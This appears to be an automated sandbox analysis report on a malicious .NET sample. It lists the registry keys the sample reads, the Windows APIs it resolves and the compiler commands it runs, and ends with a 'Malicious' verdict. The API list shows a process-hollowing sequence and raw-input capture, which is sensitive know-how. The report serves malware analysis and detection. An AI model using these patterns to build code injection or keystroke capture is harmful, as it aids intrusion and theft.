HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\95DA1246
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

-

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
user32.dll.RegisterRawInputDevices
user32.dll.GetRawInputData
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP"

Started Services

Nothing to display

Created Services

Nothing to display

#infosec #automation

TheSystem Itself @ 2018-05-27 19:26:18

Detected family: #Malicious

TheSystem Itself @ 2018-05-28 15:00:02